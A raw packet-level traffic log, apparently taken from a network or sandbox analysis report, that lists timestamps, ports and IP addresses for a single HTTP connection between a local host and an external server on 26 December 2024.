Dec 26, 2024 12:41:47.716542006 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.717264891 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.717272997 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.717312098 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.718122959 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.718131065 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.718179941 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.718915939 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.719718933 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.719820023 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.719830036 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.719955921 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.719996929 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.720689058 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.720902920 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.721009016 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.721590996 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.722045898 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.722095966 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.722450972 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.722524881 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.722670078 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.723367929 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.723376036 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.723431110 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.724268913 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.724275112 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.724319935 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.725125074 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.725604057 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.725652933 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.725948095 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.726491928 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.726880074 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.726886988 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.726927042 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.727751017 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.727931976 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.728660107 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.728712082 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.729103088 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.729209900 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.729531050 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.729547977 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.729597092 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.730508089 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.730613947 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.730709076 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.731245041 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.731256008 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.731328011 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.732093096 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.732302904 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.732348919 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.733033895 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.733041048 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.733099937 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.734299898 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.734307051 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.734363079 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.734735966 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.735030890 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.735069036 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.735640049 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.735651970 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.735696077 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.736443996 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.737360954 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.737411022 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.737449884 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.737462997 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.737514973 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.738219023 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.738564014 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.738630056 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.739124060 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.739684105 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.739737034 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.739938021 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.740241051 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.740309954 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.740897894 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.740910053 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.740950108 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.741769075 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.742265940 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.742348909 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.742388010 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.742460966 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.742554903 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.743223906 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.743480921 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.743540049 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.744110107 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.744286060 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.744333029 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.744955063 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.793777943 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.827081919 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.909785986 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.909936905 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.909984112 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.910340071 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.910377979 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.910442114 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.911127090 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.911386967 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.911505938 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.912061930 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.912070036 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.912113905 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.912920952 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.912926912 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.912985086 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.913830042 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.913899899 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.913954020 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.914648056 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.914954901 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.915043116 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.915499926 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.915537119 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.915579081 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.916445971 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.916457891 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.916512966 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.917289019 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.917355061 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.917398930 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.918148994 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.918289900 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.918330908 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.919018984 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.919665098 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.919758081 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.920039892 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.920052052 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.920085907 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.920814037 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.920876026 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.920958042 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.921648979 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.921889067 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.921941042 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.922542095 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.922825098 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.922923088 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.923466921 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.924391031 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.924401999 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.924455881 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.924541950 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.924607992 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.925192118 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.925204039 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.925255060 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.926007986 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.926522017 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.926578045 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.926929951 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.926942110 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.926992893 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.927927971 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.927939892 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.927999973 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.928708076 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.929054976 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.929107904 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.929529905 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.929866076 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.929919004 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.930483103 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.930495024 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.930542946 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.931286097 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.931351900 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.931401968 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.932185888 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.932198048 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.932239056 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.933115005 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.933126926 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.933172941 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.933998108 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.934009075 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.934062958 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.934784889 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.934963942 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.935029984 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.935667992 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.935893059 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.935933113 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.936551094 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.936763048 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.937174082 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.937458038 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.937568903 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.937613964 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.938304901 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.938429117 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.938559055 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.939254045 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.939416885 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.939459085 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.940157890 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.940170050 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.940213919 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.940962076 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.940975904 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.941020966 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.941802025 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.941967964 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.942014933 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.942682028 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.943141937 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.943244934 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.943567991 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.944281101 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.944328070 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.944418907 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.944575071 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.944623947 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.945317984 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.945566893 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.946916103 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.946928978 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.946963072 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.946990967 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.947081089 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.947093010 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.947133064 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.948318958 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.948332071 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.948378086 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.948905945 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.948919058 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.948977947 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.949733973 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.949745893 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.949780941 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.950647116 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.950659037 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.950947046 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.951435089 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.951972008 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.952022076 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.952354908 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.952408075 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.952449083 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.953037024 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.953231096 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.953578949 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.953835011 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.954152107 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.954200029 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.954700947 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.954906940 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.954983950 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:47.955548048 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:47.996884108 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.120363951 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.120409012 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.120457888 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.120666981 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.120784998 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.120924950 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.121490002 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.121598959 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.121650934 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.122385979 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.122572899 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.122632027 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.123274088 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.123286009 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.123327017 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.124202013 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.124305010 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.124355078 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.125009060 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.125247002 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.125292063 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.125868082 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.126270056 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.126311064 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.126789093 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.126920938 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.126967907 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.127686024 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.127748966 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.127796888 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.128562927 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.128808975 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.128875971 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.129390955 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.129534960 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.130296946 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.130307913 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.130345106 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.131145954 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.131220102 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.131262064 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.132107019 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.132359982 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.132416010 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.132937908 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.132950068 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.132987976 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.133819103 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.133831024 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.133908987 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.134640932 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.134680986 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.134722948 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.135545015 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.135884047 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.135926008 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.136398077 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.137073040 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.137121916 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.137264967 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.138155937 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.138206959 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.138226032 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.138241053 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.138289928 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.139019012 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.139431953 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.139477015 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.139899015 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.140295982 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.140389919 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.140820980 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.140841961 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.140883923 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.141644001 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.141774893 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.141824007 CET	49768	80	192.168.2.7	185.215.113.16
Dec 26, 2024 12:41:48.142530918 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.142945051 CET	80	49768	185.215.113.16	192.168.2.7
Dec 26, 2024 12:41:48.143040895 CET	49768	80	192.168.2.7	185.215.113.16
